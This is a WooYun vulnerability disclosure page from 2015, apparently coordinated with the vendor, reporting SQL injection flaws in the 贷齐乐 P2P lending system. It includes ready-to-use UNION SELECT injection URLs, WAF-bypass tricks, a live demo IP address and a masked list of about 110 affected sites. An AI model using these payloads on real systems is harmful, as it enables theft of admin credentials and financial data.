当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132043

漏洞标题:贷齐乐系统多处SQL注入漏洞可影响大量P2P网贷站点(附100+案例)

相关厂商:chinaanhe.com

漏洞作者: 路人甲

提交时间:2015-08-08 08:51

修复时间:2015-11-06 16:12

公开时间:2015-11-06 16:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-08: 细节已通知厂商并且等待厂商处理中
2015-08-08: 厂商已经确认,细节仅向厂商公开
2015-08-11: 细节向第三方安全合作伙伴开放
2015-10-02: 细节向核心白帽子及相关领域专家公开
2015-10-12: 细节向普通白帽子公开
2015-10-22: 细节向实习白帽子公开
2015-11-06: 细节向公众公开

简要描述:

现在全国百分之七十以上的借贷网站都是用贷齐乐系统搭建的

详细说明:

产品:贷齐乐系统
厂商:http://www.chinaanhe.com/ 网贷系统|网贷系统开发|p2p借贷系统源码-宁波贷齐乐网络科技有限公司
 宁波贷齐乐网络科技有限公司是一家专业从事P2P网络借贷平台开发的战略性电子商务有限公司,坐落于美丽港湾-宁波(南部商务区),在国内是最领先的P2P在线借贷平台开发供应商之一,提供在线智能融资的电子商务P2P平台。
贷齐乐经过多年研发的P2P网络贷款中介系统,已经成功帮助多个平台顺利上线运营,且在数月之内冲值金额达到数千万元。特别成功月交易量1000万以上的平台有400多家,正在施工建设的有50来家。
  SQL注入点其实是很多的,但是也有WAF,都是一些比较简单的WAF可以直接绕过去,可以直接注出管理员账户密码,但是这里我还不清楚字段和表是什么。下面注入点有一些需要禁用Javascript才能正常测试,否则提示登录,我们来简单的做测试。
第一处SQL注入:

/plugins/?q=area&area_id=1  area_id存在注入;站点百分百存在该注入,这个注入最有用了


以官方demo来看,这个注入点是存在过滤的,而且各种不同的站点还有不同的过滤方法,有些站点甚至根本没有过滤~

01.png


的确是存在注入,但是过滤了select之类的;可以双写select来绕过WAF。

http://121.40.166.230:10021/plugins/?q=area&area_id=-1 union selselectect 1,current_user,3,4,5,6%23


02.png


再看某个站点居然没有过滤select只过滤了空格,可以用/**/绕过

03.png


SQLMAP加上tamper轻松自然的注入啊!

10.png


第二处SQL:

/bbs/main.html?q=reply&action=quote&tid=48/**/and/**/0/**/UNION/**/SELECT/**/1,2,3,4,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30  99%的站点存在该注入漏洞


以官方demo来看这个注入,虽然的确过滤了空格,而且在输出的时候没有进行解码,另外似乎也过滤了括号,但是支持union不影响我们可以读取到管理员的信息啊。

04.png


试试其它的站点也是依然存在的,

05.png


06.png


第三处SQL注入:

/bbs/main.html?q=reply&action=reply&tid=1/**/and/**/0/**/UNION/**/SELECT/**/1,2,3,4,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30&f=1 和上门一样action方法不一样而已


07.png


https的案例测试:

09.png


第四处SQL注入:

/creditshop/main.html?classid=1/**/and/**/0/**/UNION/**/SELECT/**/1,2,3,current_user,5,6,7,8,9,10,11 classid也存在注入过滤但不影响读取管理员或者其它信息


08.png


第五处SQL注入:

/creditshop/product/main.html?id=1/**/and/**/0/**/UNION/**/SELECT/**/1,2,3,current_user,5,6,7,8,9,10,11


11.png


其实还有一些注入需要截断的,但以本人的技术还没办法绕过这些WAF,但也必须提出来一下~
求各位大牛绕过。
以下部分需要登录。
第六处:

http://121.40.166.230:10021/?ask&status=%273 求截断


12.png


第七处:

http://121.40.166.230:10021/index.php?user&q=code/borrow/gathering&status=0'&page=  需要登录,求截断


13.png


第八处:

http://121.40.166.230:10021/creditshop/main.html?classid=&price=0,1000'&order= price存在注入,求截断以及绕过长度限制


14.png


不多说了。

漏洞证明:

给案例加点马赛克保护资金吧、
可以看到还有大量https的站点,危害可想而知
官方demo:http://121.40.166.230:10021/

mask 区域 
1.http://**.**.**/plugins/q=area&area_id=-1%27_
2.http://**.**.**/plugins/q=area&area_id=-1%27_
3.http://**.**.**/plugins/q=area&area_id=-1%27_
4.http://**.**.**/plugins/q=area&area_id=-1%27_
5.http://**.**.**/plugins/q=area&area_id=-1%27_
6.http://**.**.**/plugins/q=area&area_id=-1%27_
7.http://**.**.**//plugins/q=area&area_id=-1%27_
8.http://**.**.**/plugins/q=area&area_id=-1%27_
9.http://**.**.**/plugins/q=area&area_id=-1%27_
10.http://**.**.**//plugins/q=area&area_id=-1%27_
11.http://**.**.**/plugins/q=area&area_id=-1%27_
12.http://**.**.**/plugins/q=area&area_id=-1%27_
13.http://**.**.**//plugins/q=area&area_id=-1%27_
14.http://**.**.**/plugins/q=area&area_id=-1%27_
15.http://**.**.**/plugins/q=area&area_id=-1%27_
16.http://**.**.**/plugins/q=area&area_id=-1%27_
17.http://**.**.**/plugins/q=area&area_id=-1%27_
18.http://**.**.**/plugins/q=area&area_id=-1%27_
19.http://**.**.**//plugins/q=area&area_id=-1%27 _
20.https://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
21.https://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
22.https://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
23.https://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
24.https://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
25.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
26.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
27.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
28.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
29.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
30.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
31.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
32.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
33.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
34.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
35.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
36.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
37.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
38.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
39.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
40.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
41.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
42.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
43.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
44.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
45.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
46.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
47.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
48.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
49.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
50.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
51.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
52.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
53.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
54.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
55.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
56.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
57.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
58.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
59.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
60.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
61.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
62.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
63.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
64.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
65.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
66.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
67.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
68.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
69.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
70.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
71.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
72.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
73.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
74.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
75.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
76.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
77.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
78.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
79.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
80.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
81.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
82.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
83.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
84.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
85.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
86.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
87.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
88.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
89.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
90.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
91.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
92.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
93.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
94.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
95.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
96.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
97.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
98.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
99.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
100.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
101.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
102.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
103.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
104.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
105.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
106.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
107.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
108.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
109.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
110.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748

修复方案:

通知厂商修复就是了

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-08-08 16:10

厂商回复:

非常感觉,我们极其注重安全,会及时处理的

最新状态:

暂无